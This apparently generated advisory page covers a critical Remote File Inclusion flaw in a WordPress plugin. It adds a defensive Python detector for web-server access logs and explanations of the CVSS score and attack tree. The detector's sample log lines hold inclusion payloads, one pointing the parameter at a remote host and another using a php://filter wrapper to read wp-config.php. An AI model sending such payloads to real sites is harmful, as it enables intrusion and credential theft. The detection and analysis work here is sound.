Description

The Where I Was, Where I Will Be plugin for WordPress is vulnerable to Remote File Inclusion in version 1.1.1 via the WIW_HEADER parameter of the systemincludeinclude_user.php file. This makes it possible for unauthenticated attackers to include and execute arbitrary files hosted on external servers, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution. Exploitation requires the PHP ini directive allow_url_include to be On, which is not commonly enabled: it defaults to Off and has been deprecated since PHP 7.4. Check the effective value on the target (php -i | grep allow_url_include, or phpinfo()) before rating an installed copy of 1.1.1 as remotely exploitable for code execution.
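The advisory names the sink (a file-inclusion parameter) and the precondition (allow_url_include), which is enough to write a log check for the attempt itself. The following is an added example, not code from the page or from the plugin: a small Python detector that scans combined-format web-server access logs for requests that supply a URL or PHP stream wrapper in WIW_HEADER, undoing repeated percent-encoding so that double-encoded payloads are not missed. The log lines, client addresses and the plugin's directory path are constructed for the example; only the parameter name comes from the advisory.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample access-log lines (combined log format). The plugin
# directory, file path and client addresses are assumed for illustration;
# only the parameter name WIW_HEADER is taken from the advisory.
SAMPLE_LOG = """\
203.0.113.5 - - [14/Jun/2024:10:01:02 +0000] "GET /wp-content/plugins/where-i-was/system/include/include_user.php?WIW_HEADER=http://203.0.113.99/x.txt HTTP/1.1" 200 512 "-" "curl/8.0"
203.0.113.5 - - [14/Jun/2024:10:01:05 +0000] "GET /wp-content/plugins/where-i-was/system/include/include_user.php?WIW_HEADER=https%253A%252F%252F203.0.113.99%252Fx.txt HTTP/1.1" 200 512 "-" "curl/8.0"
203.0.113.7 - - [14/Jun/2024:10:02:11 +0000] "GET /wp-content/plugins/where-i-was/system/include/include_user.php?WIW_HEADER=php://filter/convert.base64-encode/resource=wp-config.php HTTP/1.1" 200 9981 "-" "python-requests/2.31"
198.51.100.2 - - [14/Jun/2024:10:03:40 +0000] "GET /wp-content/plugins/where-i-was/system/include/include_user.php?WIW_HEADER=default_header HTTP/1.1" 200 301 "-" "Mozilla/5.0"
198.51.100.2 - - [14/Jun/2024:10:04:01 +0000] "GET /?redirect_to=http://203.0.113.99/ HTTP/1.1" 302 0 "-" "Mozilla/5.0"
garbage line that is not an access-log record
"""

# Combined log format: client, ident, user, [timestamp], "METHOD target PROTO", status, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]+)" (?P<status>\d{3})'
)

# Schemes that include() will fetch remotely when allow_url_include=On (http, https,
# ftp, data), plus stream wrappers that are commonly tried against the same sink.
# php:// works regardless of allow_url_include, so a hit on it shows the parameter
# being probed for local inclusion rather than remote inclusion.
REMOTE_SCHEME = re.compile(
    r"^\s*(?:https?|ftps?|php|data|expect|phar|glob|zip|compress\.(?:zlib|bzip2))\s*:",
    re.IGNORECASE,
)

# The parameter named in the advisory. PHP's $_GET keys are case-sensitive.
TARGET_PARAM = "WIW_HEADER"


def decode_fully(value, max_rounds=3):
    """Undo repeated percent-encoding; attackers double-encode to dodge naive filters."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify_request(target):
    """Return the offending WIW_HEADER value if the request target looks like an
    inclusion attempt, else None. parse_qs already decodes one layer of encoding;
    decode_fully strips any further layers before the scheme check."""
    query = urlsplit(target).query
    for key, values in parse_qs(query, keep_blank_values=True).items():
        if key != TARGET_PARAM:
            continue
        for raw in values:
            candidate = decode_fully(raw)
            if REMOTE_SCHEME.match(candidate):
                return candidate
    return None


def scan_log(text):
    """Return (client_ip, status, decoded_value) for every log record whose
    WIW_HEADER parameter carries a URL or stream wrapper. Unparseable lines
    are skipped rather than treated as errors."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        value = classify_request(m.group("target"))
        if value is not None:
            hits.append((m.group("ip"), int(m.group("status")), value))
    return hits


if __name__ == "__main__":
    for ip, status, value in scan_log(SAMPLE_LOG):
        print(f"{ip} status={status} WIW_HEADER={value}")
```

The detector is deliberately narrow: it keys on the one parameter the advisory names, so the constructed redirect_to line with a URL in a different parameter is not flagged, and a plain value such as default_header is ignored. A 200 response to one of the flagged requests is not by itself proof that the include succeeded; it only shows that the sink was reached, so follow a hit with a look at the PHP configuration and at outbound connections from the web server to the host named in the payload.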

CPEs
  • wordpress where_i_was_where_i_will_be 1.1.1

CVSS

CVSS version: 3.1
Base score: 9.8
Base severity: CRITICAL
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Exploitability score: 3.9
Impact score: 5.9

Can you explain the CVE description?

The description covers a Remote File Inclusion flaw in version 1.1.1 of the Where I Was, Where I Will Be plugin for WordPress. The WIW_HEADER parameter of the systemincludeinclude_user.php file is passed to a PHP include without adequate validation, so an unauthenticated attacker can point it at a file on a server they control and have the PHP code in that file executed on the WordPress host. That code runs with the web server's privileges, which is why the advisory lists access-control bypass, disclosure of sensitive data and code execution as consequences. The CVSS 3.1 base score is 9.8 (CRITICAL): network attack vector, low attack complexity, no privileges or user interaction required, and high impact on confidentiality, integrity and availability; the exploitability subscore is 3.9 and the impact subscore 5.9. That score rates the worst case. Remote inclusion only works when the PHP ini directive allow_url_include is On, which is off by default and deprecated since PHP 7.4, so an installed copy of 1.1.1 is exposed to the remote-code case only on hosts that have enabled it; whether the same parameter can be abused for local file inclusion when the directive is off is not stated in this advisory. The CVE was published on 2024-06-14 and is listed on this page with EARLY_WARNING status.

How can this vulnerability be part of an attack tree?

In an attack tree this flaw is an initial-access leaf rather than a goal in itself. Its preconditions are a reachable WordPress site running version 1.1.1 of the plugin and allow_url_include enabled in that site's PHP configuration; no account is needed. The attacker hosts a PHP file on a server they control, supplies its URL in the WIW_HEADER parameter of systemincludeinclude_user.php, and the server includes and executes it. The child nodes are the usual post-exploitation branches on a WordPress host: reading configuration files for database credentials, exfiltrating site data, creating or elevating an administrator account, planting a persistent web shell, or pivoting to other systems reachable from the web server. Because the code runs unauthenticated and as the web-server user, a single request turns a public-facing plugin bug into full compromise of the site, and the rest of the tree is constrained only by the privileges and network position of that user.


Generated on: 2024-07-01